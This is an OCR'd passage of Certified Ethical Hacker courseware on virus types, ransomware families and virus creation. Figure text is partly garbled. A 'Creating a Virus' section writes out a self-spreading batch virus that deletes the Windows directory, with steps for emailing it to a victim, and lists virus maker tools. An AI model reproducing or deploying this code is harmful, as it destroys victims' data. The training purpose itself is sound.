Malicious online ads: Attackers post malicious online ads by embedding malicious code in the ads, also known as malvertising. Once users click these ads, their computers get infected.

=

Social Media: People tend to click on social media sites, including malicious links shared by their contacts, which can infect their systems.

Module 07 Page 1031 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Types of Viruses @

CEH

Viruses are categories according to their functioning and targets

\@ Some of the example includes:

System or Boot Sector Virus

Polymorphic Virus

Web Scripting Virus

File and Multipartite Virus

Metamorphic Virus

Email and Armored Virus

Macro and Cluster Virus

Overwriting File or Cavity Virus

Add-on and Intrusive Virus

Stealth/Tunneling Virus

Companion/Camouflage Virus

Direct Action or Transient Virus

Encryption Virus

Shell and File Extension Virus

Terminate & Stay Resident Virus

Sparse Infector Virus

FAT and Logic Bomb Virus

Types of Viruses Computer viruses are malicious software programs written by attackers to gain unauthorized access to a target system. Thus, they compromise the security of the system as well as its performance. For any virus to corrupt a system, it has to first associate its code with executable code. It is important to understand how viruses: =

Add themselves to the target host’s code

=

Choose to act upon the target system

Viruses are categories according to their functioning and targets. Some of the most common types of computer viruses that adversely affect the security of systems are listed below: 1.

System or Boot Sector Virus

10. Metamorphic Virus

2.

File Virus

11. Overwriting File or Cavity Virus

3.

Multipartite Virus

12. Companion Virus/Camouflage Virus

4.

Macro Virus

13. Shell Virus

5.

Cluster Virus

14. File Extension Virus

6.

Stealth/Tunneling Virus

15. FAT Virus

7.

Encryption Virus

16. Logic Bomb Virus

8.

Sparse Infector Virus

17. Web Scripting Virus

9.

Polymorphic Virus

18. Email Virus

Module 07 Page 1032

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

19. Armored Virus

22. Direct Action or Transient Virus

20. Add-on Virus

23. Terminate

(TSR)

21. Intrusive Virus

and

Stay

Resident

Virus

System or Boot Sector Viruses The most common targets for a virus are the system sectors, which include the master boot record (MBR) and the DOS boot record system sectors. An OS executes code in these areas while booting. Every disk has some sort of system sector. MBRs are the most virus-prone zones because if the MBR is corrupted, all data will be lost. The DOS boot sector also executes during system booting. This is a crucial point of attack for viruses. The system sector consists of only 512 bytes of disk space. Therefore, system sector viruses conceal their code in some other disk space. The primary carriers of system or boot sector viruses are email attachments and removable media (USB drives). Such viruses reside in memory. Some sector viruses also spread through infected files; these are known as multipartite viruses. A boot sector virus moves MBR to another location on the hard disk and copies itself to the original location of MBR. When the system boots, first, the virus code executes and then control passes to the original MBR. Before Infection

OnmSaa | |a li Cd

After Infection




Figure 7.38: Working of system and boot sector virus

=

Virus Removal System sector viruses create the illusion that there is no virus on the system. One way to deal with this virus is to avoid the use of the Windows OS and switch to Linux or Mac, because Windows is more prone to such attacks. Linux and Macintosh have built-in safeguards for protection against these viruses. The other approach is to periodically perform antivirus checks.

File Viruses File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be direct-action (non-resident) or memory-resident viruses.

File viruses insert their code into the original file and infect executable files. Such viruses are numerous, albeit rare. They infect in a variety of ways and are found in numerous file types. Module 07 Page 1033 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

The most common type of file virus operates by identifying the file type it can infect most easily, such as that with filenames ending in .COM or .EXE. During program execution, the virus executes along with program files to infect more files. Overwriting a virus is not easy, as the overwritten programs no longer function properly. These viruses tend to be found immediately. Before inserting their code into a program, some file viruses save the original instructions and allow the original program to execute, so that everything appears normal. File viruses hide their presence using stealth techniques to reside in a computer’s memory in the same way as system sector viruses. They do not show any increase in file length while performing directory listing. If a user attempts to read the file, the virus intercepts the request, and the user gets back his original file. File viruses can infect many file types, as a wide variety of infection techniques exist.

Attacker Figure 7.39: Working of file virus

Multipartite Viruses A multipartite virus (also known as a multipart virus or file infectors and boot record infectors and attempts sector and the executable or program files. When the turn, affect the system files and vice versa. This type of is not rooted out entirely from the target machine.

hybrid virus) combines the approach of to simultaneously attack both the boot virus infects the boot sector, it will, in virus re-infects a system repeatedly if it

Macro Viruses

Macro viruses infects Microsoft Word or similar applications by automatically performing a sequence of actions after triggering an application. Most macro viruses are written using the macro language Visual Basic for Applications (VBA), and they infect templates or convert infected documents into template files while maintaining their appearance of common document files. Macro viruses are somewhat less harmful than other viruses. They usually spread via email. Pure data files do not allow the spreading of viruses, but sometimes, the average user, due to the extensive macro languages used in some programs, easily overlooks the line between a data file and an executable file. In most cases, just to make things easy for users, the line between a data file and a program starts to blur only when the default macros are set to run automatically every time the data file is loaded. Virus writers can exploit universal programs with macro capability, such as Microsoft Word, Excel, and other Office programs. Windows Help files can also contain macro code.

Module 07 Page 1034

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

uw {at {a

sees eeeeeeeeeeeeeseeeeeeeeeeeeeesssssssss

Infects Macro Enabled Documents

>

Attacker

User Figure 7.40: Working of a macro virus

Cluster Viruses Cluster viruses infect files without changing the file or planting additional files. They save the virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk read point to the virus code instead of the actual program. Even though the changes in the directory entry may affect all the programs, only one copy of the virus exists on the disk. A cluster virus, e.g., Dir-2, first launches itself when any system, and control is then passed to the actual program.

program

starts on the

computer

This virus infection leads to severe problems if the victim does not know its exact location. If it infects memory, it controls access to the directory structure on the disk. If the victim boots from a clean USB pen drive and then runs a utility such as CHKDSK, the utility reports a serious problem with the cross-linked file on the disk. Such utilities usually offer to correct the problem. If the offer is accepted, the virus infects all the executable files and results in the loss of original content, or all files might appear to be of the same size. Stealth Viruses/Tunneling Viruses These viruses try to hide from antivirus programs by actively altering and corrupting the service call interrupts while running. The virus code replaces the requests to perform operations with respect to these service call interrupts. These viruses state false information to hide their presence from antivirus programs. For example, a stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code. A stealth virus hides from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other system drive, thus replacing the infected file with the uninfected file that is stored on the hard drive. In addition, a stealth virus hides the modifications performed by it. It takes control of the system’s functions that read files or system sectors. When another program requests information that has already modified by the virus, the stealth virus reports that information to the requesting program instead. This virus also resides in memory. To avoid detection, these viruses always take over system functions and use them to hide their

presence.

One of the carriers of stealth viruses is the rootkit. Installing a rootkit results in such a virus attack because a Trojan installs the rootkit and is thus capable of hiding any malware.

Module 07 Page 1035 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Give me the system

Hides Infected

file tcpip.sys to scan

TCPIP.SYS

Preerrirr titi Antivirus Software



PPrrrrerrr rt Teri) VIRUS

Original TCPIP.SYS Figure 7.41: Working of stealth virus/tunneling virus

=

Virus Removal co

Always perform a cold boot (boot from write-protected CD or DVD)

o

Never use DOS commands such as FDISK to fix the virus

©

Use antivirus software

Encryption Viruses Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware, codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an encrypted copy of the virus and a decryption module. The decryption module remains constant, whereas the encryption makes use of different keys.

An encryption key consists of a decryption module and an encrypted copy of the code, which enciphers the virus. When the attacker injects the virus into the target machine, the decryptor will first execute and decrypt the virus body. Then, the virus body executes and replicates or becomes resident in the target machine. The replication process is successfully accomplished using the encryptor. Each virus-infected file uses a different key for encryption. These viruses employ XOR on each byte with a randomized key. The decryption technique employed is “x,” or each byte with a randomized key is generated and saved by the root virus. Encryption viruses block access to target machines or provide victims with limited access to the system. They use encryption to hide from virus scanners. The virus scanner cannot detect the encryption virus using signatures, but it can detect the decrypting module.

Module 07 Page 1036

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Encryption key 1

Encryption key 2

cee eeeeeeeeeneeeeeneeeeeseees D>

Virus Code

Encryption Virus 1

Encryption

Virus 2

Encryption Virus 3 Figure 7.42: Working of encryption virus

Sparse Infector Viruses

To spread infection, viruses typically attempt to hide from antivirus programs. Sparse infector viruses infect less often and try to minimize their probability of discovery. These viruses infect only occasionally upon satisfying certain conditions or infect only those files whose lengths fall within a narrow range. The sparse infector virus works with two approaches: =

Replicates only occasionally (e.g., every tenth program executed or on a particular day of the week)

=

Determines which file to infect based on certain conditions (e.g., infects target files with a maximum size of 128 kb)

The diagram below shows the working of a sparse infector virus.

The attacker sends a sparse infector virus to the target machine and sets a wakeup call for the virus to execute on the 15th day of every month. This strategy makes it difficult for the antivirus program to detect the virus, thus allowing the virus to infect the target machine successfully. =!

Wake up on 15** of

|

@

| \

every month and execute code Cee eee renerer

Figure 7.43: Working of sparse infector virus

Polymorphic Viruses Such viruses infect a file with an encrypted copy of a polymorphic code already decoded by a decryption module. Polymorphic viruses modify their code for each replication to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. Polymorphic mechanisms use random number generators in their implementation. Module 07 Page 1037

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

The general use of the mutation engine is to enable polymorphic code. The mutator provides a sequence of instructions that a virus scanner can use to optimize an appropriate detection algorithm. Slow polymorphic code prevents antivirus professionals from accessing the code. A simple integrity checker detects the presence of a polymorphic virus in the system’s disk.

A polymorphic virus consists of three components: the encrypted virus code, the decryptor routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus code. It decrypts the code only after taking control of the computer. The mutation engine generates randomized decryption routines. Such decryption routines vary whenever the virus infects a new program. The polymorphic virus encrypts both the mutation engine and the virus code. When the user executes a polymorphic-virus-infected program, the decryptor routine takes complete control of the system, after which it decrypts the virus code and the mutation engine. Next, the decryption routine transfers the system control of the virus, which locates a new program to infect. In the Random Access Memory (RAM), the virus makes a replica of itself as well as the mutation engine. Then, the virus instructs the encrypted mutation engine to generate a new randomized decryption routine, which can decrypt the virus. Here, the virus encrypts the new copies of both the virus code and the mutation engine. Thus, this virus, along with the newly encrypted virus code and encrypted mutation engine (EME), appends the new decryption routine to a new program, thereby continuing the process.

Polymorphic viruses running on target systems are difficult to detect due to the encryption of the virus body and the changes in the decryption routine each time these viruses infect. It is difficult for virus scanners to identify these viruses, as no two infections look alike. Encrypted Mut:

Engine (EME)

Encrypted Mutation

Engine oa Encrypted Virus Code

i

|

: m Instruct 2

tocreate ?

| -@:. seneee Decryptor routine |

Decryptor Routine

4A F instruct } to create E new EME 5

new DR

fect and mutation

New Encrypted

°

e

‘Mutation Engine (EME)

Virus Code

engine

with new key

© User Runs an Infected Program

virus does the Damage RAM

Figure 7.44: Working of polymorphic virus

Metamorphic Viruses Metamorphic viruses are programmed such that they rewrite themselves completely each time they infect a new executable file. Such viruses are sophisticated and use metamorphic engines for their execution. Metamorphic code reprograms itself. It is translated into temporary code (a new variant of the same virus but with different code) and then converted back into the original code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. Metamorphic viruses are more effective than polymorphic viruses.

Module 07 Page 1038

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

The transformation of virus bodies ranges from simple to complex, depending on the technique used. Some techniques used for metamorphosing viruses are as follows: Disassembler Expander Permutator

Assembler Virus bodies are transformed in the following steps:

au F WN

1.

Inserts dead code

Reshapes expressions Reorders instructions

Modifies variable names

Encrypts program code Modifies program control structure

Variant 1

Variant 2

seed > Metamorphic Engine

Variant 3

This diagram depicts metamorphic malware variants with recorded code

Figure 7.45: Working of metamorphic virus

Overwriting File or Cavity Viruses

Some programs have empty spaces in them. Cavity viruses, also known as space fillers, overwrite a part of the host file with a constant (usually nulls), without increasing the length of the file while preserving its functionality. Maintaining a constant file size when infecting allows the virus to avoid detection. Cavity viruses are rarely found due to the unavailability of hosts and code complexity. A new design of a Windows file, called the Portable Executable (PE), improves the loading speed of programs. However, it leaves a particular gap in the file while it is being executed, which can be used by the cavity virus to insert itself.

Module 07 Page 1039

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Content in the file before infection Sales and marketing management is the

Content in the file after infection Null

Null

Null

Null

Null

Null

Null

Null Null Null Null Null Null

leading authority for executives in the sales 'd market tt industri and marketing management industries.

Null

The suspect, Desmond Turner, surrendered

Null

Null

Null

Null

Null

Null

Null

to authorities at a downtown

Null

Null

Null

Null

Null

Null

Null

fast-food restaurant

Indianapolis

Null Null Null Null Null Null Null

Null Null Null Null Null Null Null

Null Null Null Null Null Null

Original File Size: 45 KB

Infected File Size: 45 KB

Figure 7.46: Working of overwriting file or cavity virus

Companion/Camouflage Viruses

The companion virus stores itself with the same filename as the target program file. The virus infects the computer upon executing the file, and it modifies the hard disk data. Companion viruses use DOS to run COM files before the execution of EXE files. The virus installs an identical COM file and infects EXE files. This is what happens. Suppose that a companion virus is executing on the PC and decides that it is time to infect a file. It looks around and happens to find a file called notepad.exe. It now creates a file called notepad.com, containing the virus. The virus usually plants this file in the same directory as the .exe file; however, it can also place it in any directory on the DOS path. If you type notepad and press Enter, DOS executes notepad.com instead of notepad.exe (in sequence, DOS will execute COM, then EXE, and then BAT files with the same root name, if they are all in the same directory). The virus executes, possibly infecting more files, and then loads and executes notepad.exe. The user would probably fail to notice that something is wrong. It is easy to detect a companion virus just by the presence of the extra COM file in the system. Virus infects the system with a file notepad.com and saves it in c:\winnt\system3z2 directory

Attacker

Ct

>

Notepad.exe

®

Notepad.com

Figure 7.47: Working of companion virus/ camouflage virus

Shell Viruses The shell virus code forms a shell around the target host program’s code, making itself the original program with the host code as its sub-routine. Nearly all boot program viruses are shell viruses.

Module 07 Page 1040

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

Before Infection

o Ema 1 iid

After Infection



Figure 7.48: Working of shell virus

File Extension Viruses

File extension viruses change the extensions of files. The extension .TXT is safe as it indicates a pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT. If you have forgotten that extensions are turned off, you might think that this is a text file and open it. It actually is an executable Visual Basic Script virus file and could cause severe damage.

The guidelines to secure files against such virus infection are as follows:

=

Turn off “Hide file extensions” in Windows (Go to Control Panel > Appearance and Personalization > Show hidden files and folders > View tab > Uncheck Hide extensions for known file types).

=

Scan all the files in the system using robust antivirus software; this requires a substantial amount of time. File Explorer Options

x

General View — Search Folder views

You can apply this view (such as Details or Icons) to

al folders ofthis type. Apply to Folders

(Reset Folders

Advanced settings:

@ Display file size information in foldertips

© Display the full path in the title bar

SS Hidden files and folders

‘© Dont show hidden files, folders, or dives

O Show hidden files, folders, and drives merge:

CO Hide protected operating system files (Recommended) CO Launch folder windows in a separate process

CO Restore previous folder windows at logon

OK

Cancel

Aoply

Figure 7.49: Screenshot displaying Folder Options Window

Module 07 Page 1041

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

FAT Viruses

A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in Microsoft products and some other types of computer systems to access the information stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer. FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly. Many are designed to overwrite files or directories, and material on a computer can lost permanently. If a FAT virus is sufficiently powerful, it can render a computer unusable in addition to destroying data, forcing a user to reformat the computer. Essentially, a FAT virus destroys the index, thereby making it impossible for a computer to locate files. The virus can spread to files when the FAT attempts to access them, corrupting the entire computer eventually. FAT viruses often manifest in the form of corrupted files, with users noting that files are missing or inaccessible. The FAT architecture itself can also be changed; e.g., a computer that should be using the FAT32 protocol might abruptly say that it is using FAT12. Logic Bomb Viruses A logic bomb is a virus that is triggered by a response to an event, such as the launching of an application or when a specific date/time is reached, where it involves logic to execute the trigger. For example, cyber-criminals use spyware to covertly install a keylogger on your computer. The keylogger can capture keystrokes, such as usernames and passwords. The logic bomb is designed to wait until you visit a website that requires you to log in with your credentials, such as a banking site or social network. Consequently, the logic bomb will be triggered to execute the keylogger, capture your credentials, and send them to a remote attacker. When a logic bomb is programmed to execute on a specific date, it is referred to as a time bomb. Time bombs are usually programmed to set off when important dates are reached, such as Christmas and Valentine’s Day. Web Scripting Viruses A web scripting virus is a type of computer security vulnerability that breaches your web browser security through a website. This allows attackers to inject client-side scripting into the web page. It can bypass access controls and steal information from the web browser. Web scripting viruses are usually used to attack sites with large populations, such as sites for social networking, user reviews, and email. Web scripting viruses can propagate slightly faster than other viruses. A typical version of web scripting viruses is DDoS. It has the potential to send spam, damage data, and defraud users. There are two types of web scripting viruses: non-persistent and persistent. Non-persistent viruses attack you without your knowledge. In the case of a persistent virus, your cookies are directly stolen, and the attacker can hijack your session, which allows the attacker to

impersonate you and cause severe damage.

Module 07 Page 1042

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Prevention

The best ways to prevent these viruses and exploits are by safely validating untrusted HTML inputs, enforcing cookie security, disabling scripts, and using scanning services such as an antivirus program with real-time protection for your web browser. It is also beneficial to avoid unknown websites and use World of Trust to ensure that a site is safe. You would notice if you are infected with a web scripting virus if your searches are linked elsewhere and the background or homepage changes. The computer runs slowly and sluggishly, and programs may close randomly. Modern-day browsers have add-ons such as Adblock Plus, which allow users to prevent scripts from being loaded. E-mail Viruses An e-mail virus refers to computer code sent to you as an e-mail attachment, which if activated, will result in some unexpected and usually harmful effects, such as destroying specific files on your hard disk and causing the attachment to be emailed to everyone in your address book. Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or stealing personal data. Such viruses also vary in terms of how they are presented. For example, a sender of an email virus may be unknown to a user, or a subject line may be filled with nonsense. In other cases, a hacker may cleverly disguise an email to appear as if it is from a trusted or known sender. To avoid email virus attacks, you should never open (or double-click on) an e-mail attachment unless you know who sent it and what the attachment contains; in addition, you must install and use antivirus software to scan any attachment before you open it. Armored Viruses Armored viruses are viruses that are designed to confuse or trick deployed antivirus systems to prevent them from detecting the actual source of the infection. These viruses make it difficult for antivirus programs to trace the actual source of the attack. They trick antivirus programs by showing some other location even though they are actually on the system itself. The following basic techniques are adopted by armored viruses: =

Anti-disassembly Anti-disassembly is a technique that uses specially crafted code or data in a program to produce an incorrect program listing by disassembly analysis tools.

=

Anti-debugging Anti-debugging techniques are used to ensure that the program is not running under the debugger. This can slow down the process of reverse engineering, but it cannot be prevented.

=

Anti-heuristics Anti-heuristics are used in machine code to prevent heuristic analysis, and they rely on the program's ability to protect itself from programmer and debugger intervention.

Module 07 Page 1043

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Anti-emulation

Anti-emulation techniques are used to avoid dynamic analysis by fingerprinting the emulated system environment; they can also secure intellectual property against emulation-assisted reverse engineering.

=

Anti-goat Anti-goat techniques use heuristic rules to detect possible goat files such as a virus that cannot infect a file if it is too small or if it contains a large amount of do-nothing instructions. Anti-goat viruses require more time for analysis.

Add-on Viruses Add-on viruses append their code to the host code without making any changes to the latter or relocate the host code to insert their code at the beginning.

Figure 7.50: Working of add-on virus.

Intrusive Viruses Intrusive viruses overwrite the host code completely or partly with the viral code.

Figure 7.51: Working of intrusive virus

Direct Action or Transient Viruses

Direct action or transient viruses transfer all controls of the host code to where it resides in the memory. It selects the target program to be modified and corrupts it. The life of a transient virus is directly proportional to the life of its host. Therefore, transient virus executes only upon the execution of its attached program and terminates upon the termination of its attached program. At the time of execution, the virus may spread to other programs. This virus is transient or direct, as it operates only for a short period and goes directly to the disk to search for programs to infect. Terminate and Stay Resident (TSR) Viruses A terminate and stay resident (TSR) virus remains permanently in the target machine’s memory during an entire work session, even after the target host’s program is executed and terminated. The TSR virus remains in memory and therefore has some control over the processes. In general, the TSR virus incorporates interrupt vectors into its code so that when an interrupt

Module 07 Page 1044

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

occurs, the vector directs execution to the TSR code. If the TSR virus infects the system, the user needs to reboot the system to remove the virus without a trace.

The following steps are employed by TSR viruses to infect files: =

Gets control of the system

=

Assigns a portion of memory for its code

=

Transfers and activates itself in the allocated portion of memory

=

Hooks the execution of code flow to itself

=

Starts replicating to infect files

Module 07 Page 1045

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Ransomware (@

CE H

Ransomware is a type of malware that restricts access to a computer system’s files and folders and demands an online ransom

payment to the malware creator(s) to remove the restrictions

BlackCat

© erent

ow at

z



Ransomware Families

BlackCat is dangerous

e e e e © e @ © @ e

ransomware that targets operating systems from

almost all vendors, including Windows, Linux, and ESXi virtual machines

me

BlackCat Ransom Note

XingLocker Conti Thanos WastedLocker RansomEXX NETWALKER QNAPCrypt Maze

Ryuk

Al Rights Reserved. Reproduction i

Ransomware (Cont'd) |

CE H

It mainly targets Windows-based devices. It

uses encryption keys such as RSA public and BlackMatter | AES keys for initializing and implementing Salsa20 encryption ]

Ransomware

Clop Ransomware DeadBolt Egregor Dharma eChOraix SamSam WannaCry

Petya - NotPetya GandCrab

MegaCortex LockerGoga NamPoHyu

Ryuk

CryptghOst

Ransomware

Ransomware is a type of malware that restricts access to the infected computer system or critical files and documents stored on it, and then demands an online ransom payment to the malware creator(s) to remove user restrictions. Ransomware might encrypt files stored on the system’s hard disk or merely lock the system and display messages meant to trick the user into paying the ransom.

Module 07 Page 1046

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Usually, ransomware spreads as a Trojan, entering a system through email attachments, hacked websites, infected programs, app downloads from untrusted sites, vulnerabilities in network services, and so on. After execution, the payload in the ransomware runs and encrypts the victim’s data (files and documents), which can be decrypted only by the malware author. In some cases, user interaction is restricted using a simple payload. In a web browser, a text file or webpage displays the ransomware demands. The displayed messages appear to be from companies or law enforcement personnel falsely claiming that the victim’s system is being used for illegal purposes or contains illegal content (e.g., porn videos, pirated software), or it could be a Microsoft product activation notice falsely claiming that installed Office software is fake and requires product re-activation. These messages entice victims into paying money to undo the restrictions imposed on them. Ransomware leverages victims’ fear, trust, surprise, and embarrassment to get them to pay the ransom demanded. Ransomware Families Some additional ransomware families are as follows:

=

Cerber

=

RansomEXX

=

XingLocker

=

NETWALKER

=~

Conti

=

QNAPCrypt

=

Thanos

=

Maze

=

WastedLocker

=

Ryuk

Examples of Ransomware =

BlackCat BlackCat is a dreadful ransomware attack written in Rust and profoundly known as ALPHA (AlphaVM, AlphaV). It was first discovered in late November 2021. The ransomware targets almost all vendor OSes including Windows, Linux, and ESXi virtual machines. It is specially crafted ransomware comprising 4 encryption routines and supports several encryption algorithms such as ChaCha20 and AES. This ransomware is supplied as ransomware as a service (RaaS), engaging associates to operate from various locations. Using Blackcat, attackers can target various IT industries worldwide for demanding a ransom from the victims in the form of Bitcoins and Monero. The attack mainly focuses on crashing targeted devices and running processes, applications, and VMs during their encryption process. BlackCat employs phishing tactics on the victims by delivering its payload using vulnerable applications and exposed toolsets.

Module 07 Page 1047

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Aa



x

0

fir

x

(OGRE

ee

+

Stes

ee

20

«%

Your network was compromised. Important Files on your network was downloaded and encrypted. We used an asymmetric cipher to encrypt your files. Meaning the only way to decrypt them is to have a Private Key.

ur custom Decrypt App is bundled with your Private Key. In order to buy it you have to follow Instructions below. If you have questions please feel free to use Live Chat. ‘Act quicly to get a discount! Decrypt App Price

|

You have 4 days, 09:22:09 until:

+ Decrypt App special discount period will discontinued. be * Discount price is available until 12/14/21, 3:41 AM

Discount Price:

$3000000

Full Price:

‘$3500000

Status ‘Awaiting payment of $3000000 to one of the following wallets:

Bitcoin Monero

[e]

SAWS P SC HIRI OSK AMIR at WRK SENN DRSSHOROHERIAY

$3450000 (”) = 71.533725 BTC $3000000 = 15495.867769 XMR

a Instructions

Live Chat

Trial Decrypt

Intermediary

Figure 7.52: BlackCat ransom note

=

BlackMatter BlackMatter

considered

is dangerous

an extension

ransomware

of dreadful

written

in C. It was

ransomware

discovered

such as DarkSide

and

in 2021

and

REvil. This

ransomware mainly targets Windows devices can also compromise Linux devices using unique payloads that can be later used to develop RATs for exploiting Windows devices. The attackers mainly target organizations having high-level turnovers, excluding the companies that were already attacked using DarkSide and REvil. This ransomware uses encryption keys such as RSA public and AES keys for initializing and implementing Salsa20 encryption on the targeted files. The encryption process is crafted in such a manner that the encrypted file consists of a decrypting blob that comprises a special tool to facilitate the post-ransom money transfer by the victim. This malware is also supplied as RaaS, engaging associates to operate from various locations. BlackMatter crashes various files and closes all the other running processes and applications while encrypting the targeted files on the victim device. Using this malware, attackers can also gain control over domain controllers, ACLs, and other user access controls (UACs). Module 07 Page 1048

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

®) BlackMatter

REFRESH.

Ransomware

Now

Time to end

3,000,000

©

@ 89.91 ®

1217434

After time end

End date: 03 Aug, 21:35 PM [NY time]

We increase post with your data on our blog Go To BL0G Post Blog post

PRIVATE

6,000,000 179.83 @ 24348.67 @

timer for talks

Data size |

1024 GB: 10% for bitcoin(f you willing to pay init)

Test decryption Figure 7.53: BlackMatter ransom note

The following are some additional ransomware:

=

Clop Ransomware

=

Petya - NotPetya

=

DeadBolt

=

GandCrab

=

Egregor

=

MegaCortex

=

Dharma

=

LockerGoga

=

eChOraix

=

NamPoHyu

=

SamSam

=

Ryuk

=

WannaCry

=~

CryptghOst

Module 07 Page 1049

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

How to Infect Systems Using aVirus: Creating a Virus

CE H

Avirus can be created in two different ways:

© Writing aVirus Program ©

Using Virus Maker Tools

Send the Game.com file as

4

an email attachmentto a victim

Create a batch file

Game.bat with this text

@ Writing a Virus Program

@ echo off

for %%f in (*.bat) do copy %%£ + Game.bat del c:\Windows\*.*

v

v

Convert the Game. bat batch file to Game.com using the bat2com utility

When run, it copies itself to all the .bat files in the current directory and deletes all the files in the Windows directory,

How to Infect Systems Using aVirus: Creating a Virus (Cont’d) @ UsingVirus Maker Tools

DELmE’s Batch Virus Maker

DELME batch virus maker creates viruses that can perform tasks such as deleting files on a hard disk drive, disabling admin privileges, cleaning the registry, and killing tasks

CE H

JPS Virus Maker

2s (rus Maker 40)

Virus Maker Tools

© Bhavesh Virus Maker SKW © Deadly Virus Maker © SonicBat Batch Virus Maker © TeraBIT Virus Maker @ Andreinick05's Batch Virus Maker

How to Infect Systems Using a Virus Attackers can infect systems using a virus in the following steps: =

Creating Virus

=

Propagating and Deploying Virus

Module 07 Page 1050

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Creating a Virus A virus can be created in two ways: writing a virus program, and using virus maker tools. =

Writing a Simple Virus Program

The following steps are involved in writing a simple virus program: 1.

Create a batch file Game.bat with the following text: @ echo off

for %%f in (*.bat) do copy %%f + Game.bat del c:\Windows\*.*

=

2.

Convert the Game.bat batch file into Game.com using the bat2com utility

3.

Send the Game.com file as an email attachment to the victim

4.

When Game.com is executed by the victim, it copies itself to all the .bat files in the current directory on the target machine and deletes all the files in the Windows directory

Using Virus Maker Tools Virus maker tools allow you to customize and craft your virus into a single executable file. The nature of the virus depends on the options available in the virus maker tool. Once the virus file is built and executed, it can perform the following tasks: o

Disable Windows command prompt and Windows Task Manager

o

Shut down the system

o

Infect all executable files

©

Inject itself into the Windows registry and start up with Windows

o

Perform non-malicious activity such as unusual mouse and keyboard actions

Module 07 Page 1051 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

The following tool s are useful for testing the security of your own antivirus software. o

DELmE’s Batch Virus Maker DELmE’s Batch Virus Generator is a virus creation program with many options to infect the victim’s PC, such as formatting the C: drive, deleting all the files in the hard disk drive, disabling admin privileges, cleaning the registry, changing the home page, killing tasks, and disabling/removing the antivirus and firewall.

eo

